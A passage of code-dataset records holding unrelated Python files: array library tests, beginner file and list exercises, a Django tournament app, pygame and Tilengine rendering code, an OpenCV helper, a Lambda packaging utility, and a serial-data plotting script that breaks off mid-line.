builder.endlist()\n builder.beginlist()\n builder.real(1.1)\n builder.endlist()\n builder.beginlist()\n builder.real(1.1)\n builder.real(2.2)\n builder.endlist()\n builder.beginlist()\n builder.real(1.1)\n builder.real(2.2)\n builder.real(3.3)\n builder.endlist()\n\n assert ak.to_list(builder.snapshot()) == [\n 0,\n 1,\n 2,\n [],\n [1.1],\n [1.1, 2.2],\n [1.1, 2.2, 3.3],\n ]\n\n assert ak.to_list(\n ak.from_iter([0, 1, 2, [], [1.1], [1.1, 2.2], [1.1, 2.2, 3.3]])\n ) == [0, 1, 2, [], [1.1], [1.1, 2.2], [1.1, 2.2, 3.3]]\n assert ak.to_list(\n ak.from_iter(\n [\n 0,\n 1,\n 2,\n [],\n \"zero\",\n [1.1],\n \"one\",\n [1.1, 2.2],\n \"two\",\n [1.1, 2.2, 3.3],\n \"three\",\n ]\n )\n ) == [\n 0,\n 1,\n 2,\n [],\n \"zero\",\n [1.1],\n \"one\",\n [1.1, 2.2],\n \"two\",\n [1.1, 2.2, 3.3],\n \"three\",\n ]\n assert ak.to_list(\n ak.from_json(\n '[0, 1, 2, [], \"zero\", [1.1], \"one\", [1.1, 2.2], \"two\", [1.1, 2.2, 3.3], \"three\"]'\n )\n ) == [\n 0,\n 1,\n 2,\n [],\n \"zero\",\n [1.1],\n \"one\",\n [1.1, 2.2],\n \"two\",\n [1.1, 2.2, 3.3],\n \"three\",\n ]\n assert (\n ak.to_json(\n ak.from_json(\n '[0,1,2,[],\"zero\",[1.1],\"one\",[1.1,2.2],\"two\",[1.1,2.2,3.3],\"three\"]'\n )\n )\n == '[0,1,2,[],\"zero\",[1.1],\"one\",[1.1,2.2],\"two\",[1.1,2.2,3.3],\"three\"]'\n )\n","sub_path":"tests/test_0084-start-unionarray.py","file_name":"test_0084-start-unionarray.py","file_ext":"py","file_size_in_byte":8197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"240249425","text":"import codecs\n'''\nFileObject = open('data.txt' , 'r' , encoding='utf-8')\ncontent = 'Process finished with exit code 1'\nprint(content , file=open('data.txt' , 'a' , encoding='utf-8'))\nFileObject.close()\n'''\n\n'''\nExercise 902\n讀取read.txt,內容為整數,用空格分開\n將所有整數加總,並印出加總結果\n\nFileObject = open('read_1.txt' , 'r' , encoding='utf-8')\nInputFile = FileObject.read()\nFileObject.close()\n\n#將InputFile的內容,依空格為單位進行分割\nnum = InputFile.split(' ')\n#預設總和為0\nSum = 0\n\n#加總\nfor i in range(0,len(num)):\n print(num[i] , end=' ')\n Sum = Sum + eval(num[i])\n\nprint('\\n總和為: ' , Sum)\n'''\n\n'''\nExercise 904\n讀取read.txt,內容為名字、身高、體重,用空格分開\n印出所有人的平均身高、平均體重、最高者、最重者\n*浮點數到小數點第2位\n\nFileObject = open('read_2.txt' , 'r' , encoding='utf-8')\nInputFile = FileObject.read()\nFileObject.close()\n\n#===============================\n#宣告變數\n#===============================\n#所有人資料\nData = []\n#名字List\nName = []\n#身高List\nHeight = []\n#體重List\nWeight = []\n#最高身高\nMax_H = 0\n#最重體重\nMax_W = 0\n\n#將換行符號 轉成 空格\nLine = InputFile.replace('\\n',' ')\n#將InputFile的內容,依空格為單位進行分割\nLine = Line.split(' ')\n\n#將分割的資料以3個為1組(名字、身高、體重)\nfor i in range(0 , len(Line) , 3):\n #用Temp存成1組資料\n Temp = [Line[i] , eval(Line[i+1]) , eval(Line[i+2])]\n #將Temp放入Data成為1組資料\n Data.append(Temp)\n\nprint(Data , '\\n')\n\n#名字\nfor i in range(0 , len(Data)):\n Name.append(Data[i][0])\n#身高\nfor i in range(0 , len(Data)):\n Height.append(Data[i][1])\n#最高者\nMax_H = max(Height)\n#體重\nfor i in range(0 , len(Data)):\n Weight.append(Data[i][2])\n#最重者\nMax_W = max(Weight)\n\n\n#平均身高\nprint('Average Height: {:.2f}' .format(sum(Height)/ len(Height)))\n\n#平均體重\nprint('Average Weight: {:.2f}' .format(sum(Weight) / len(Weight)))\n\n#最高者\nprint('Tallest: ' , Name[Height.index(Max_H)] , Max_H)\n\n#最重者\nprint('Heaviest: ' , Name[Weight.index(Max_W)] , Max_W)\n\n'''\n\n'''\nExercise 906\n輸入 檔名read_3.txt、字串s1、字串s2\n將read_3.txt中的字串s1用字串s2取代\n\nFileName = input('FileName: ')\ns1 = input('字串1: ')\ns2 = input('字串2: ')\n\nFileObject = open(FileName , 'r' , encoding='utf-8')\nInputFile = FileObject.read()\nFileObject.close()\n\n#將read_3.txt中的字串s1用字串s2取��\nOutFile = InputFile.replace(s1 , s2)\n\n#輸出檔案\nprint(OutFile , file=open(FileName , 'w' , encoding='utf-8'))\n'''\n\n'''\nExercise 908\n輸入 檔名read_4.txt,以及出現次數(單字用空格隔開)\n輸出 符合出現次數的單字,並依第1個字母排序\n\nex.\n輸入\nread_4.txt\n3\n\n輸出\na\nis\nprogram\n\n\n#===============================\n#宣告變數\n#===============================\n#單字和出現次數List\nWord = []\n#暫存單字和出現次數List\nTemp = []\n#計算相同單字出現次數,至少為1次\nTemp_Number = 1\n#儲存符合出現次數的單字\nOut_Word = []\n#是否有符合出現次數的單字,true:有符合 false:未符合\nAppear = False\n\n\nFileName = input('FileName: ')\nNumber = eval(input('出現次數: '))\n\nFileObject = open(FileName , 'r' , encoding='utf-8')\nInputFile = FileObject.read()\nFileObject.close()\n\n#將換行符號 轉成 空格\nLine = InputFile.replace('\\n',' ')\n#將InputFile的內容,依空格為單位進行分割\nLine = Line.split(' ')\n\nprint(Line)\n\n#計算相同的單字出現次數\nfor i in range(0 , len(Line) , 1):\n #如果Line[i]=='@',表示這個單字前面已經計算過,不在計算\n if(Line[i]=='@'):continue\n #一一比較單字是否相同\n for j in range(i+1 , len(Line) , 1):\n #如果碰到相同單字\n if(Line[i] == Line[j]):\n #則出現次數+1\n Temp_Number = Temp_Number + 1\n #並將該位置的單字改為'@',表示這個單字已經計算過\n Line[j] = '@'\n #將單字和出現次數存成List\n Temp = [Line[i] , Temp_Number]\n #放入Word\n Word.append(Temp)\n #出現次數恢復成初始值\n Temp_Number = 1\n\n#將符合出現次數的單字List放入Out_Word\nfor i in range(0 , len(Word)):\n if(Word[i][1] == Number):\n #有符合出現次數的單字\n Appear = True\n Temp = Word[i][0]\n Out_Word.append(Temp)\n\n#印出Out_Word\nif(Appear == True): print(sorted(Out_Word))\nelse: print('沒有符合出現次數的單字')\n'''\n\n'''\nExercise 910\n讀取read_5.dat,第1列為欄位名稱,第2列為個人資料\n輸出男生人數、女生人數(0:代表女生、1:代表男生)\n\n學號 姓名 性別 科系\n101 阿明 1 餐旅管理\n202 阿忠 1 資工\n303 小華 0 語文\n404 篠美 0 應英\n505 安凱 1 日文\n\n\n#===============================\n#宣告變數\n#===============================\n#所有人資料List\nData = []\n#暫存所有人資料List\nTemp = []\n#男生人數\nMale_Number = 0\n#女生人數\nFemale_Number = 0\n\nFileObject = open('read_5.txt' , 'r' )\nInputFile = FileObject.read()\nFileObject.close()\n\n\n#將換行符號 轉成 空格\nLine = InputFile.replace('\\n',' ')\n#將InputFile的內容,依空格為單位進行分割\nLine = Line.split(' ')\n\nprint(Line , '\\n')\n\n#將資料分隔成一個人一組('學號', '姓名', '性別', '科系')\nfor i in range(4 , len(Line) , 4):\n Temp = [eval(Line[i]) , Line[i+1] , eval(Line[i+2]) , Line[i+3]]\n Data.append(Temp);\n\n#計算人數\nfor i in range(0,len(Data)):\n if(Data[i][2] == 0): Female_Number = Female_Number + 1\n else: Male_Number = Male_Number + 1\n\n#輸出\nprint('學號', '姓名', '性別', '科系')\n\nfor i in range(0,len(Data)):\n print('{ID} {Name} {Sex} {Department}' .format(ID=Data[i][0],Name=Data[i][1],Sex=Data[i][2],Department=Data[i][3]))\n\nprint()\nprint('Female_Number: ',Female_Number)\nprint('Male_Number: ' , Male_Number)\n'''\n\n'''\n#讀取Windows文字,預設格式為ANSI\n\n# coding=MS950\n#讀取檔案(模式: 讀取r)\nFileObject = open('read_5.txt' , 'r' , encoding='ANSI')\n#讀取檔案內容\nInputFile = FileObject.read()\n#印出檔案內容\nprint(InputFile)\n#關閉檔案\nFileObject.close()\n'''\n\n'''\n讀取內容為中文的檔案\n將txt另存新檔存成utf-8的格式\n'''\n#讀取檔案(模式: 讀取r)\nFileObject = open('chinese_read_1.txt' , 'r' , encoding='utf-8')\n#讀取檔案內容\nInputFile = FileObject.read()\n#印出檔案內容\nprint(InputFile)\n#關閉檔案\nFileObject.close()\n\n'''\n寫入內容為中文的檔案\n'''\n#要寫入的中文字串\nNewStr = '如何用Python(复制)写入中文txt文件'\n\n#讀取檔案(模式: 寫入w 或 接續a)\nFileObject = open('chinese_read_1.txt' , 'a' , encoding='utf-8')\n#寫入檔案,先用encode編碼,再用decode解碼\nFileObject.write(NewStr.encode('utf-8').decode('utf-8'))\n#關閉檔案\nFileObject.close()\n\n","sub_path":"Python_Learn/File_inout_test.py","file_name":"File_inout_test.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"431710207","text":"# exercise 32\nthe_count = [1, 2, 9, 4, 5]\nfruits = ['apples', 'oranges', 'pears', 'apricots']\nchange = [1, 'pennies', 2, 'dimes', 3, 'quarters']\n\n# this first kind of for-Loop goes through a list\nfor number in the_count:\n\tprint (\"This is count %d\" % number)\n\n# same as above\nfor fruit in fruits:\n\tprint (\"A fruit of type: %s\" % fruit)\n\n# also we can go through mixed lists too\n# notice we have to use %r since we don't know what's in it\nfor i in change:\n\tprint (\"I go %r\" % i)\n\n# we can also build lists, first start with an empty one\nelements = []\n\n# then use the range function to do 0 to 5 counts\nfor i in range(0, 6):\n\tprint (\"Adding %d to the list.\" % i)\n\t# append is a function that lists understand\n\telements.append(i)\n\n# now we can print them out too\nfor i in elements:\n\tprint (\"Element was: %d\" % i)\n\n# exercise 33\ni = 0\nnumbers = []\n\nwhile i < 6:\n\tprint (\"At the top i is %d\" % i)\n\tnumbers.append(i)\n\n\ti = i + 1\n\tprint (\"Numbers now: \", numbers)\n\tprint (\"At the bottom i is %d\" % i)\n\nprint (\"The numbers: \")\n\nfor num in numbers:\n\tprint (num)\n\n# exercise 35\nfrom sys import exit\n\ndef gold_room():\n\tprint(\"This room is full of gold. How much do you take?\")\n\n\tchoice = input(\"> \")\n\tif \"0\" in choice or \"1\" in choice:\n\t\thow_much = int(choice)\n\telse:\n\t\tdead(\"Man, learn to type a number.\")\n\n\tif how_much < 50:\n\t\tprint (\"Nice, you're not greedy, you win!\")\n\t\texit(0)\n\telse:\n\t\tdead(\"You greedy bastard!\")\n\n\ndef bear_room():\n\tprint (\"There is a bear here.\")\n\tprint (\"The bear has a bunch of honey.\")\n\tprint (\"The fat bear is in front of another door.\")\n\tprint (\"How are you going to move the bear?\")\n\tbear_moved = False\n\n\twhile True:\n\t\tchoice = input(\"> \")\n\n\t\tif choice == \"take honey\":\n\t\t\tdead(\"The bear looks at you then slaps your face off.\")\n\t\telif choice == \"taunt bear\" and not bear_moved:\n\t\t\tprint (\"The bear has moved from the door. You can go through it now.\")\n\t\t\tbear_moved = True\n\t\telif choice == \"taunt bear\" and bear_moved:\n\t\t\tdead(\"The bear gets pissed off and chews your leg off.\")\n\t\telif choice == \"open door\" and bear_moved:\n\t\t\tgold_room()\n\t\telse:\n\t\t\tprint (\"I got no idea what that means.\")\n\n\ndef cthulhu_room():\n\tprint (\"Here you see the great evil Cthulhu.\")\n\tprint (\"He, it, whatever stares at you and you go insane.\")\n\tprint (\"Do you flee for your life or eat your head?\")\n\n\tchoice = input(\"> \")\n\n\tif \"flee\" in choice:\n\t\tstart()\n\telif \"head\" in choice:\n\t\tdead(\"Well that was tasty!\")\n\telse:\n\t\tcthulhu_room()\n\n\ndef dead(why):\n\tprint (why, \"Good job!\")\n\texit(0)\n\ndef start():\n\tprint (\"You are in a dark room.\")\n\tprint (\"There is a door to your right and left.\")\n\tprint (\"Which one do you take?\")\n\n\tchoice = input(\"> \")\n\n\tif choice == \"left\":\n\t\tbear_room()\n\telif choice == \"right\":\n\t\tcthulhu_room()\n\telse:\n\t\tdead(\"You stumble around the room until you starve.\")\n\n\nstart()\n\n# doesn't work correctly\n# choice = input(\"> \")\n\n# if \"0\" in choice or \"1\" in choice:\n# \ttemp = int(choice)\n# \tprint (\"blq blq blq\")\n# else:\n# \tprint (\"Man, learn to type a number.\")\n\n# exercise 38\nten_things = \"Apples Oranges Crows Telephone Light Sugar\"\n\nprint (\"Wait there are not 10 things in that list. Let's fix that.\")\n\nstuff = ten_things.split(' ')\nmore_stuff = [\"Day\", \"Night\", \"Song\", \"Frisbee\", \"Corn\", \"Banana\", \"Girl\", \"Boy\"]\n\nwhile len(stuff) != 10:\n\tnext_one = more_stuff.pop()\n\tprint (\"Adding: \", next_one)\n\tstuff.append(next_one)\n\tprint (\"There are %d items now.\" % len(stuff))\n\nprint (\"There we go: \", stuff)\n\nprint (\"Let's do some things with stuff.\")\n\nprint (stuff[1])\nprint (stuff[-1])\nprint (stuff.pop())\nprint (' '.join(stuff))\nprint ('#'.join(stuff[3:5]))\nprint (\"petar\".join(stuff))\nprint (stuff)\nprint (stuff[-2])","sub_path":"python/Learn-Python-The-Hard-Way/exercises27to38.py","file_name":"exercises27to38.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"419995157","text":"class Node:\r\n def __init__(self, value):\r\n self.value = value\r\n self.next = None\r\n\r\n\r\nclass SortedLinkedList:\r\n def __init__(self):\r\n self.head = None\r\n\r\n def insert(self, value):\r\n new_node = Node(value)\r\n if not self.head:\r\n self.head = new_node\r\n elif self.head.value >= new_node.value:\r\n new_node.next = self.head\r\n self.head = new_node\r\n else:\r\n current = self.head\r\n while current.next and current.next.value < new_node.value:\r\n current = current.next\r\n new_node.next = current.next\r\n current.next = new_node\r\n\r\n def display(self):\r\n temp = self.head\r\n while temp:\r\n print(temp.value, end=' ')\r\n temp = temp.next\r\n\r\n\r\nllist = SortedLinkedList()\r\nllist.insert(5)\r\nllist.insert(10)\r\nllist.insert(7)\r\nllist.insert(3)\r\nllist.insert(1)\r\nllist.insert(9)\r\nllist.display()\r\n","sub_path":"sorted_linked_list.py","file_name":"sorted_linked_list.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"537637174","text":"from django.db import models\nfrom django.forms import ModelForm\nfrom django import forms\n\nclass Fighter(models.Model):\n alias = models.CharField('Nombre', max_length=15, primary_key=True) \n force = models.PositiveIntegerField('Fuerza', default=4)\n skill = models.PositiveIntegerField('Habilidad', default=3)\n resistance = models.PositiveIntegerField('Resistencia', default=3)\n\n def __str__(self):\n return self.alias\n\n class Meta:\n verbose_name = 'Luchador'\n verbose_name_plural = 'Luchadores'\n\nTOURNAMENT_CATEGORIES = (\n (0, 'Pluma'),\n (1, 'Tigre'),\n (2, 'León')\n)\n\nclass Tournament(models.Model):\n name = models.CharField('Nombre', max_length=150, primary_key=True)\n start_date = models.DateTimeField('Hora inicio')\n finish_date = models.DateTimeField('Hora final')\n fighter_count = models.IntegerField('Nº Jugadores')\n category = models.IntegerField('Categoria', choices=TOURNAMENT_CATEGORIES, default=0)\n dfighters = models.ManyToManyField(Fighter, verbose_name='Luchadores')\n\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Torneo'\n verbose_name_plural = 'Torneos'\n\n\nclass Disputedtournament(models.Model):\n #PROTECT No se puede eliminar el torneo al que hace referencia sin eliminar primero el torneo disputado\n name = models.OneToOneField(Tournament,on_delete=models.PROTECT,primary_key=True)\n rounds = models.IntegerField('Nº Rondas por combate')\n \n \n \n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Torneo Disputado'\n verbose_name_plural = 'Torneos Disputados'\n\n\n \n\n#---------------FORMULARIOS---------------------------------------------\n\n\n\nclass DateInput(forms.DateInput):\n input_type = 'date'\n\n\nclass TournamentForm(ModelForm):\n class Meta:\n \n start_date = forms.DateTimeField()\n model = Tournament\n fields = '__all__'\n widgets = {\n 'start_date': DateInput(),\n 'finish_date': DateInput(),\n 'dfighters': forms.CheckboxSelectMultiple() \n }\n \n\nclass FighterForm(ModelForm):\n class Meta:\n model = Fighter\n fields = '__all__'\n\n\nclass DisputedForm(ModelForm):\n class Meta:\n model = Disputedtournament\n fields = ('name', 'rounds')","sub_path":"mysite/main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"412204478","text":"# Python Crash Course: A Hands-On, Project-Based Introduction To Programming\n#\n# Name: Mark Lester Apuya\n# Date: 05/29/2021\n#\n# Chapter 7: User Input and While Loops\n#\n# Exercise 7.6 Three Exits:\n# Write different versions of either Exercise 7-4 or Exercise 7-5 that do \n# each of the following at least once:\n#\n# • Use a conditional test in the while statement to stop the loop.\n# • Use an active variable to control how long the loop runs.\n# • Use a break statement to exit the loop when the user enters a 'quit' value.\n\n# Break statement\n# puzza_topping.py\nmessage = \"\\nWhat toppings would you like on your pizza?\"\nmessage += \"\\nEnte 'quite' to end the program. \"\n\nwhile True:\n toppings = input(message)\n\n if toppings == 'quit':\n break\n else:\n print(toppings)","sub_path":"Part_1_Basics/Chapter_7_User_Input_and_while_Loops/three_exits3.py","file_name":"three_exits3.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"557502756","text":"class Solution:\n def buddyStrings(self, A: str, B: str) -> bool:\n if len(A)!=len(B):\n return False\n \n if A==B and len(set(A))= 24:\n\t\tscale = lerp (line, 24,HEIGHT, MIN_SCALE,MAX_SCALE);\n\t\taffine.sx = scale;\n\t\taffine.sy = scale;\t\t\n\t\ttln.SetLayerTransform (LAYER_BACKGROUND, affine.angle, affine.dx, affine.dy, affine.sx, affine.sy)\n\t\t\ndef SetScale (min,max):\n\t\"\"\"\"Sets the upper (min) and lower (max) scaling factor of the road\"\"\"\n\tglobal MIN_SCALE\n\tglobal MAX_SCALE\n\tMIN_SCALE = min\n\tMAX_SCALE = max\n\t\ndef SetPosition (x,y):\n\t\"\"\"Sets the location of the road\"\"\"\n\tglobal xpos\n\tglobal ypos\n\txpos = x\n\typos = y\n\t\ndef SetAngle (a):\n\t\"\"\"Sets the rotation angle (degrees) of the road\"\"\"\n\tglobal angle\n\tangle = a%360\n\t\ndef SetSpeed (s):\n\t\"\"\"\"Sets the movement speed of the road\"\"\"\n\tglobal speed\n\tspeed = s\n\n# setup engine\ntln.Init (WIDTH, HEIGHT, 2,0,0)\ntln.CreateWindowThread (\"overlay2.bmp\", tln.CWF_S2)\ntln.SetBGColor (0,0,0)\n\n# load resources\ntileset_horizon = tln.LoadTileset (\"track1_bg.tsx\")\ntilemap_horizon = tln.LoadTilemap (\"track1_bg.tmx\", \"Layer 1\")\ntileset_track = tln.LoadTileset (\"track1.tsx\")\ntilemap_track = tln.LoadTilemap (\"track1.tmx\", \"Layer 1\")\n\n# set raster callback\nCB_FUNC_TYPE = CFUNCTYPE (None, c_int)\ncb_func = CB_FUNC_TYPE(raster_callback)\ntln.SetRasterCallback (cb_func)\n","sub_path":"bindings/python/mode7_test.py","file_name":"mode7_test.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"637743139","text":"# Third-party modules\nimport pygame\nimport pygame.locals\n\n# User-defined modules\nfrom pygame_rl.renderer.pygame_renderer import TiledRenderer\nfrom pygame_rl.scenario.soccer.renderer_options import RendererOptions\n\n\nclass Renderer(TiledRenderer):\n \"\"\"Soccer renderer.\n \"\"\"\n # Constants\n title = 'Soccer'\n\n # Environment\n env = None\n\n # Renderer options\n renderer_options = None\n\n # Display state\n display_quitted = False\n\n # TMX objects\n static_overlays = None\n\n # Clock object (pygame.time.Clock())\n clock = None\n\n # Dirty groups (pygame.sprite.RenderUpdates)\n dirty_groups = None\n\n # Previous ball state\n prev_ball_state = None\n\n def __init__(self, map_path, env, renderer_options=None):\n super().__init__(map_path)\n # Save the environment\n self.env = env\n # Use or create the renderer options\n self.renderer_options = renderer_options or RendererOptions()\n\n def load(self):\n # Initialize Pygame\n pygame.display.init()\n pygame.display.set_mode([400, 300])\n pygame.display.set_caption(self.title)\n\n # Initialize the renderer\n super().load()\n\n # Set the screen size\n resolution = super().get_display_size()\n self.screen = pygame.display.set_mode(resolution)\n\n # Get the background\n self.background = super().get_background()\n\n # Get the static overlays\n self.static_overlays = super().get_overlays()\n\n # Initialize previous ball state\n self._init_prev_ball_state()\n\n # Initialize the dirty group\n self._load_dirty_group()\n\n # Blit the background to the screen\n self.screen.blit(self.background, [0, 0])\n\n # Update the full display\n if self.renderer_options.show_display:\n pygame.display.flip()\n\n # Create the clock\n self.clock = pygame.time.Clock()\n\n # Close the display if the renderer options is set to disable the\n # display\n if not self.display_quitted and not self.renderer_options.show_display:\n # Replace the screen surface with in-memory surface\n self.screen = self.screen.copy()\n # Close the display\n pygame.display.quit()\n # Prevent from further closing\n self.display_quitted = True\n\n def render(self):\n # Clear the overlays\n self.dirty_groups.clear(self.screen, self.background)\n\n # Update the overlays by the environment state\n self._update_overlay_pos()\n self._update_overlay_visibility()\n\n # Draw the overlays\n dirty = self.dirty_groups.draw(self.screen)\n\n # Update only the dirty surface\n if self.renderer_options.show_display:\n pygame.display.update(dirty)\n\n # Limit the max frames per second\n if self.renderer_options.show_display:\n self.clock.tick(self.renderer_options.max_fps)\n\n # Handle the events\n if self.renderer_options.show_display:\n for event in pygame.event.get():\n # Detect the quit event\n if event.type == pygame.locals.QUIT:\n # Indicate the rendering should stop\n return False\n # Detect the keydown event\n if self.renderer_options.enable_key_events:\n if event.type == pygame.locals.KEYDOWN:\n # Get the agent index of the first player\n team_agent_index = 0\n agent_index = self.env.get_agent_index(\n 'PLAYER', team_agent_index)\n # Prepare the cached action\n cached_action = None\n if event.key == pygame.locals.K_RIGHT:\n cached_action = 'MOVE_RIGHT'\n elif event.key == pygame.locals.K_UP:\n cached_action = 'MOVE_UP'\n elif event.key == pygame.locals.K_LEFT:\n cached_action = 'MOVE_LEFT'\n elif event.key == pygame.locals.K_DOWN:\n cached_action = 'MOVE_DOWN'\n elif event.key == pygame.locals.K_s:\n cached_action = 'STAND'\n # Take the cached action and update the state\n if cached_action:\n self.env.take_cached_action(\n agent_index, cached_action)\n self.env.update_state()\n\n # Indicate the rendering should continue\n return True\n\n def _init_prev_ball_state(self):\n agent_size = self.env.options.agent_size\n self.prev_ball_state = agent_size * [None]\n\n def _load_dirty_group(self):\n self.dirty_groups = pygame.sprite.RenderUpdates()\n\n def _update_overlay_pos(self):\n for agent_index in range(self.env.options.agent_size):\n [overlay_has_ball, overlay_no_ball] = self._get_overlays(\n agent_index)\n has_ball = self.env.state.get_agent_ball(agent_index)\n agent_pos = self.env.state.get_agent_pos(agent_index)\n if has_ball:\n overlay_has_ball.set_pos(agent_pos)\n else:\n overlay_no_ball.set_pos(agent_pos)\n\n def _update_overlay_visibility(self):\n for agent_index in range(self.env.options.agent_size):\n # Get the static overlays\n [overlay_has_ball, overlay_no_ball] = self._get_overlays(\n agent_index)\n # Check whether the agent has the ball\n has_ball = self.env.state.get_agent_ball(agent_index)\n # Get the previous ball state\n prev_has_ball = self.prev_ball_state[agent_index]\n # Check whether the ball state has changed\n if prev_has_ball is None or prev_has_ball != has_ball:\n # Remove the old sprite and add the new sprite in the dirty\n # group\n if has_ball:\n self.dirty_groups.remove(overlay_no_ball)\n self.dirty_groups.add(overlay_has_ball)\n else:\n self.dirty_groups.remove(overlay_has_ball)\n self.dirty_groups.add(overlay_no_ball)\n # Set the previous ball state\n self.prev_ball_state[agent_index] = has_ball\n\n def _get_overlays(self, agent_index):\n name_has_ball = 'AGENT{}_BALL'.format(agent_index + 1)\n name_no_ball = 'AGENT{}'.format(agent_index + 1)\n overlay_has_ball = self.static_overlays[name_has_ball]\n overlay_no_ball = self.static_overlays[name_no_ball]\n return [overlay_has_ball, overlay_no_ball]\n","sub_path":"pygame_rl/scenario/soccer/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":6819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"546535458","text":"import cv2\nimport numpy as np\n\ndef identifica_bordas(img_bovino):\n # Converte a imagem para tons de cinza\n cinza = cv2.cvtColor(img_bovino, cv2.COLOR_BGR2GRAY)\n\n # Suavização\n blur = cv2.GaussianBlur(cinza,(41,41),0)\n\n # Passa Alta\n filtered = cinza - blur\n filtered = filtered + 127 * np.ones(cinza.shape, np.uint8)\n\n res = filtered.copy()\n\n for i in range(0, res.shape[0]):\n for j in range(0, res.shape[1]):\n (r) = res[i, j]\n if (r < 105):\n res[i, j] = (0)\n else:\n res[i, j] = (255)\n\n return filtered, res","sub_path":"proj_mosca/mosca/m_identifica_bordas.py","file_name":"m_identifica_bordas.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"309073356","text":"import zipfile\nimport os\nimport httplib\n\ndef archive_function(zip_dir, func_name):\n \"\"\"Archives a given function, and returns the \"\"\"\n\n archive_loc = os.path.join('./', zip_dir, func_name + '.zip')\n function_zip = zipfile.ZipFile(archive_loc, 'w', zipfile.ZIP_DEFLATED)\n for root, dirs, files in os.walk('venv/lib/python2.7/site-packages'):\n for file in files:\n file_path = os.path.join(root, file)\n function_zip.write(file_path)\n function_zip.write(os.path.join('lambda_handlers', func_name + '.py'), func_name + '.py')\n function_zip.close()\n\n return archive_loc\n\ndef get_ip():\n ip_conn = httplib.HTTPConnection('checkip.amazonaws.com')\n try:\n ip_conn.request(\"GET\", \"/\")\n res = ip_conn.getresponse()\n if res.status == 200:\n res = res.read()\n return res[:-1]\n else:\n return None\n finally:\n ip_conn.close()\n","sub_path":"deployment/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"73001025","text":"import extract\nimport numpy as np\nimport serial\nimport threading\n\nimport matplotlib.pyplot as plt\nimport matplotlib._color_data as mcd\nfrom drawnow import *\nimport timeit\nimport time\n\ncolor_map = list({name for name in mcd.CSS4_COLORS if \"xkcd:\" + name in mcd.XKCD_COLORS})\nexitThread = False\n\nlow = -10000\nhigh = 10000\n\n\nclass Receiver:\n def __init__(self, *args, wide=31, show=15):\n self.port_num = \"\"\n self.baud_rate = 9600\n self.line = []\n self.cnt = 0\n self.pre = 0\n self.now = 0\n self.elapsed_time = []\n self.signal = None\n self.num_receive = 0\n self.num_sensors = 0\n self.dataArr = []\n self.Arr = None\n self.sensor_dict = dict(zip(args, np.zeros(len(args))))\n self.sensor_data = []\n self.wide = wide\n self.show = show\n self.low = -10000\n self.high = 10000\n self.start_time = timeit.default_timer()\n\n def set_port_num(self, port_num):\n self.port_num = port_num\n\n def set_baud_rate(self, baud_rate):\n self.baud_rate = baud_rate\n\n def set_using_sensor(self, *args):\n for sensor in [arg for arg in args if arg in self.sensor_dict.keys()]:\n self.sensor_dict[sensor] = 1\n\n def get_used_sensor(self):\n return [key for (key, val) in self.sensor_dict.items() if val == 1]\n \n def receive(self, ser, ignore_line=2):\n global exitThread\n\n self.start_time = timeit.default_timer()\n while not exitThread:\n for val in ser.read():\n # print(self.line)\n self.line.append(chr(val))\n if val == 10:\n self.Arr = self.parsing_data(self.line)\n print(self.Arr)\n self.sensor_data.append(self.Arr)\n if len(self.sensor_data) > self.wide:\n self.sensor_data.pop()\n self.elapsed_time.pop()\n self.receive_time = timeit.default_timer()\n self.elapsed_time.append(self.receive_time - self.start_time)\n self.line = []\n\n self.num_receive+=1\n\n if self.num_receive > self.wide:\n if self.num_receive%self.show == 0:\n drawnow(self.make_fig)\n plt.pause(.000001)\n\n def make_fig(self):\n global color_map\n plt.title(\"title\")\n cmap_list = color_map[:len(self.sensor_data)]\n plt.plot(self.sensor_data, color=cmap_list)\n plt.ylim(self.low, self.high) # Set y min and max values\n plt.grid(True)\n # graph_legend = \n legend = self.get_used_sensor()\n plt.legend(legend)\n\n # fig, ax = plt.subplots(figsize=(20,12))\n # fig = plt.plot(self.Arr, color=cmap_list)\n # ax.set_xticklabels(labels = elapsed_time)\n # ax.legend(graph_legend)\n \n # def receive(self, ser, ignore_line=1):\n # while TRUE:\n # if self.num_receive <= ignore_line:\n # self.signal = ser.readlines()\n # self.num_receive += 1\n # time.sleep(0.1)\n # # del self.signal\n # else:\n # # self.signal = ser.readline()\n # # print(self.signal)\n # # time.sleep(0.001)\n # receive_time = timeit.default_timer()\n # self.elapsed_time.append(self.start_time - receive_time)\n # # print(ser.readline())\n # for val in ser.read():\n # self.line.append(chr(val))\n # if val == 10:\n # self.Arr = self.parsing_data(self.line)\n # print(self.Arr)\n # self.sensor_data.append(self.Arr)\n\n # if len(self.sensor_data) > self.wide:\n # self.sensor_data.pop()\n # self.elapsed_time.pop()\n # self.num_receive += 1\n # if self.num_receive % 100 == 0:\n # print(self.num_receive)\n\n # if receiver.num_receive > 200:\n # drawnow(make_fig(array=receiver.sensor_data, legend=receiver.get_used_sensor()))\n # stop_receive = get_stop_situation()\n\n def parsing_data(self, data, strip='[]', split=','):\n self.line = \"\".join(data)\n self.dataArr = self.line.strip().strip(strip).split(split)\n self.dataArr = np.array([int(val) for val in self.dataArr])\n return self.dataArr[[idx for idx, 